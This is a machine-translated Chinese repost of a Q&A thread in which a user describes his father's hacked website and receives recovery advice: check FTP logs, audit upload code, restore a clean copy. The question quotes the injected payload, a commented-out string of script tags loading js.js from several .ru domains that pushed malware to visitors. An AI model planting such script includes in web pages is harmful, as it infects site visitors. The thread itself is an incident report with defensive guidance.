我的网站被黑了..我该怎么办？ [关闭]

2024-04-28

我爸爸今天打电话给我，说访问他网站的人收到了 168 个病毒，试图下载到他们的计算机上。他根本不懂技术，而是用所见即所得的编辑器构建了整个东西。

我打开他的网站并查看了源代码，在源代码底部的 HTML 结束标记之前有一行 Javascript 包含内容。他们包括这个文件（以及许多其他文件）：http://www.98hs.ru/js.js http://www.98hs.ru/js.js <-- 在访问该 URL 之前，请关闭 JavaScript。

所以我暂时把它注释掉了。事实证明，他的 FTP 密码是一个简单的字典单词，长度为 6 个字母，因此我们认为这就是它被黑客入侵的原因。我们已将他的密码更改为 8 位以上的非单词字符串（他不会选择密码，因为他是一个喜欢打字的人）。

I did a 98hs.ru 上的 WHOIS http://whois.domaintools.com/98hs.ru并发现它是由智利的服务器托管的。实际上也有一个与之相关的电子邮件地址，但我严重怀疑这个人就是罪魁祸首。可能只是其他一些被黑客攻击的网站......

我现在不知道该怎么办，因为我以前从未处理过此类事情。有人有什么建议吗？

他通过 webhost4life.com 使用简单的、不安全的 ftp。我什至没有看到办法do他们网站上的 sftp。我想他的用户名和密码被截获了？

那么，为了使其与社区更相关，您应该采取哪些步骤/应该遵循哪些最佳实践来保护您的网站免遭黑客攻击？

作为记录，这是“神奇地”添加到他的文件中的代码行（并且不在他计算机上的文件中 - 我将其注释掉只是为了绝对确保它不会执行任何操作在此页面上，尽管我确信杰夫会防止这一点）：

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

尝试收集尽可能多的信息。查看主机是否可以为您提供一个日志，显示与您的帐户建立的所有 FTP 连接。您可以使用这些来查看是否是用于进行更改并可能获取 IP 地址的 FTP 连接。

如果您使用的是预打包软件，例如 Wordpress、Drupal 或其他任何您没有编写代码的软件，则上传代码中可能存在允许此类修改的漏洞。如果是定制的，请仔细检查允许用户上传文件或修改现有文件的所有位置。

第二件事是按原样转储站点并检查所有内容是否有其他修改。这可能只是他们所做的一项修改，但如果他们通过 FTP 进入，谁知道上面还有什么。

将您的站点恢复到已知的良好状态，并根据需要升级到最新版本。

您还必须考虑一定程度的回报。这种损害是否值得尝试追踪该人，或者这只是您生活、学习和使用更强密码的事情？

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

security

cracking

我的网站被黑了..我该怎么办？ [关闭] 的相关文章

安卓应用安全

我想开发一个用户数据非常敏感的应用程序我是开发新手所以不确定以下内容技术对于安全或高效来说是必要的请留下您的评论提前致谢为了额外的安全性我们可以避开市场游戏商店并将应用程序安装在个人设备上它会让它更安全吗我必须在设备上
上传文件最安全的方法是什么？

我工作的公司最近在我们托管的网站上遭受了许多标头注入和文件上传漏洞攻击虽然我们已经解决了标头注入攻击的问题但我们尚未控制上传漏洞我正在尝试设置一系列即插即用类型的上传脚本以供内部使用设计人员可以将其复制到其网站的结构中修改一些变量
企业 iPhone 应用程序无线分发的安全性 - OTA iOS

在企业 iPhone 应用程序的无线分发中 iPhone 安全地下载 XML 清单文件其中包含指向 ipa 文件应用程序本身的完全限定 URL 然后从那里下载应用程序并安装它我想知道这里是否存在安全漏洞假设 iPhone 位于公共
基本身份验证：是否可以像 getRemoteUser() 一样设置RemoteUser

您好我正在使用基本身份验证方法来保护我的 Web 应用程序中的某些页面其中有指定的 url 模式如下
使用 KMS 的 AWS RDS 加密是否会影响性能？

Amazon states https aws amazon com about aws whats new 2015 01 06 amazon rds encryption with kms mysql postgresql that 加
Spring Security 实体字段级安全

我有一个 Spring MVC 应用程序它提供了一个视图其中显示了来自Customer实体例如姓名地址电话号码等该应用程序具有各种角色例如ROLE USER and ROLE ADMIN 用户具有ROLE USER只能看到客户
通过 web.config 设置拒绝目录中的所有文件

作为测试我尝试使用 web config 通过以下方式控制安全性拒绝访问目录中除特定文件之外的所有文件允许访问目录中除特定文件之外的所有文件所以我设置 web config 如下
Linux 缓冲区溢出环境变量

我一直在审查不同类型的缓冲区溢出并遇到了一个我不记得为什么会发生的问题下面的代码是我尝试执行缓冲区溢出的程序 include
如何阻止浏览器在选项卡之间共享会话？

How to NOT在多个浏览器选项卡之间共享会话我在 JSP Servlet 应用程序中使用 Spring Security 我想知道我们如何使用 Spring Security 实现用户在更改浏览器选项卡时被迫再次登录的行为免责声
使用openssl从服务器获取证书

我正在尝试获取远程服务器的证书然后可以将其添加到我的密钥库中并在我的 Java 应用程序中使用一位高级开发人员正在度假告诉我我可以运行这个 openssl s client connect host host 9999 获取转储的原
.net 4.5.1 ASP.NET MVC 5 中的用户锁定

因此在新的 Net Framework 4 5 1 AspNetUser 表中没有用于在有限次数的不成功尝试后将用户锁定的列是否有为此目的构建的框架或解决方案来取代以前的 net 框架中曾经存在的功能还是我必须自己构建在即将发布的
Bash 中的 Shellshock 漏洞背后的行为是有记录的还是有意为之？

最近的一个漏洞 CVE 2014 6271 http web nvd nist gov view vuln detail vulnId CVE 2014 6271 如何Bash http en wikipedia org wiki Bash
Android应用程序中的模式输入

我想知道是否有其他替代方案可以替代 Android 上平庸的 EditText 密码输入是否有 API 或开源代码可以集成到我的应用程序中类似于锁屏图案解锁 Intent 可能会返回哈希值数字字符串或代表用户输入的模式的任何内容我
openssl_crypt 中初始化向量的使用

我看了一下this https stackoverflow com questions 1391132 two way encryption in php问题并想为自己做当我运行这段代码时直接取自这个答案 https stackove
保护 JSF 应用程序的安全

我的一位自由职业者朋友邀请我加入他的 JSF 2 0 项目我正在慢慢加快速度并将各个部分整合在一起来自 Windows Forms NET 世界至少可以说我还有很多东西需要学习我主要担心的是对于如何保护 JSF 应用程序缺乏明显的
Cloud Firestore 安全规则使用的语言名称是什么？

我想知道用于 Cloud Firestore 安全规则的语法名称如下所述https firebase google com docs firestore security get started authuser 0 https fire
无法使用前导 ../ 在顶级目录之上退出

我有一个 asp net 网站我们有管理区域其中的登录页面仅供管理员使用并且所有网站都允许所有人使用当我收到此错误时我需要询问如何为其定义正确的安全配置 Cannot use a leading to exit above the
各个平台对 SHA-2 的支持情况如何？

我读到 SHA 1 即将从 FIPS 180 2 标准中退役 http gcn com articles 2010 03 03 rsa sha competition aspxhttp gcn com articles 2010 03 03
Amazon Web Services：设置 S3 策略以允许 putObject 和 getObject 但拒绝 listBucket

我在 Amazon S3 上使用 getObject 和 putObject 请求并在创建访问存储桶的策略时发现如果我不允许 listBucket 则会收到访问被拒绝错误这样做的问题是 listBucket 意味着用户可以列出存储
JavaScript 中的安全数据

我必须为 Web 测试创建生成器使用 HTML 和 JavaScript 测试必须离线和在线进行正确答案和分数评估必须是生成的测试的一部分最终用户的分数仅发送到服务器无法在服务器上进行评估并且服务器对问题一无所知它只保存最终分数

随机推荐

将 numpy datetime64 转换为长整数并返回

如何将 NumPy datetime64 转换为长整数并返回 import numpy as np import datetime np datetime64 datetime datetime now astype long 给出的值为
JSF：初始请求和回发请求？

请看一下 JSF 中的下面这行代码
C# 单文件FTP下载

我试图在 C 控制台应用程序中使用 FTP 下载文件但即使我知道路径是正确的我总是收到错误消息 550 file not found 有什么方法可以返回当前路径一旦连接到服务器 lade datei von FTP server st
从数据库或Java对象动态加载spring bean属性）

我有一个场景我需要将属性从数据库或java对象加载到bean中考虑这个例子
如何从 Next.js 应用程序访问 Kubernetes 容器环境变量？

在我的 next config js 中我有一个如下所示的部分 module exports serverRuntimeConfig Will only be available on the server side mySecret s
将 Angular 2 变量绑定到 css 伪类内容：attr() 表达式

我想比较渲染 Angular 2 变量绑定的性能 innerText 将绑定变量作为伪类的内容因为上面的方法强制元素重新渲染然而我很难尝试使角度标记与 css 一起工作这样可行 CSS my el after content att
如何将 FOR AUTO XML 结果插入表中？

我已经使用从表中检索了值 select from tableABC for xml auto elements 现在有这个精确的表tableABC在另一台服务器上我需要将这些检索到的值插入其中如何实现这一目标测试表及数据 creat
每个对象？ [复制]

这个问题在这里已经有答案了我在 JavaScript 中有对象 var object someobject Object aaa true bbb true ccc true 我该如何使用每一个呢 object each function
使用 AngularJS ng-bind-html 时从 json 数据获取 img src

所以我有一个有趣的问题但我还没有找到答案假设我从 JSON 文件中获得了一堆数据但不知何故其中一个主要字段如下所示 description img src http o aolcdn com hss storage midas 37
如何使用jquery或javascript对对象数组进行排序[重复]

这个问题在这里已经有答案了我有一个对象数组 var array id name value id name value and so on 如何让数组按属性名称升序排序 array i 1 我尝试这样做 array i 1 sort 但这
在 rdlc 中打印横向/纵向而不预览

我正在尝试以横向或纵向打印本地报告 private void Export LocalReport report Warning warnings m streams new List
Spring、Hibernate 与 google 应用引擎

项目名称 CarpoolDB 我已在另一个应用程序名称 Carpool 中添加了该项目的 jar 运行拼车应用程序时我遇到以下异常项目拼车在这里我遇到异常因为 carpoolService 在作为 Google Web应用程序
有没有办法获取任务中使用的 SubscriptionID：“Azure 资源组部署”

我在用Azure 资源组部署Azure DevOps 中的任务一些覆盖模板参数包括 SubscriptionID virtualNetworkId subscriptions 53614803 d327 4397 bf55 8dedcc2
Parse.com - 如何刷新用户信息

例如当我更改 Parse 后端中的 bool 值时我无法在 iOS 应用程序中检索该值请参阅以下屏幕截图其中用户对象的第一个布尔值是手动更改的第二个布尔值是从应用程序更改的第一个不起作用而第一个从应用程序更改却起作用我通
删除列表视图项目之间的间距

我正在尝试在 Android 中制作一个包含图像的 ListView 我希望图像在列表中彼此相对但我似乎无法消除间距这是我的 listview xml
在一段时间内切换（或闪烁）表中的特定单元格

我已经在 Html 中创建了一个表格我想让一个特定的单元格闪烁打开和关闭您能否让我知道是否可以使用 javascript h4 Two rows and three columns h4 table border 1 width 10
Android：在以下情况下如何在html中引用css文件

hi在我的应用程序中我需要在 webview 中显示一个 html 页面并且该 html 页面应该引用 css 文件的 sdcard 位置使用 link href 标签我在 sdcard gt mibook 中放置了 2 个文件即
当鼠标移动缓慢时，Bootstrap 4中的菜单消失

我在跑这把小提琴 https jsfiddle net Chamster o23865p6 当鼠标指针从开始快速移动到展开的菜单时一切都很好然而当移动速度较慢时菜单会关闭因为感觉就像鼠标左移 const menu li dro
映射同一类中的两个引用，但引用类具有复合键

我有以下数据库表为了清楚起见这些表已缩写 CREATE TABLE dbo prod uom prod id dbo uid NOT NULL Primary key uom type numeric 9 0 NOT NULL Prim
我的网站被黑了..我该怎么办？ [关闭]

Closed 这个问题是无关 help closed questions 目前不接受答案我爸爸今天打电话给我说访问他网站的人收到了 168 个病毒试图下载到他们的计算机上他根本不懂技术而是用所见即所得的编辑器构建了整个东西我打开

我的网站被黑了..我该怎么办？ [关闭]

我的网站被黑了..我该怎么办？ [关闭] 的相关文章

随机推荐

热门标签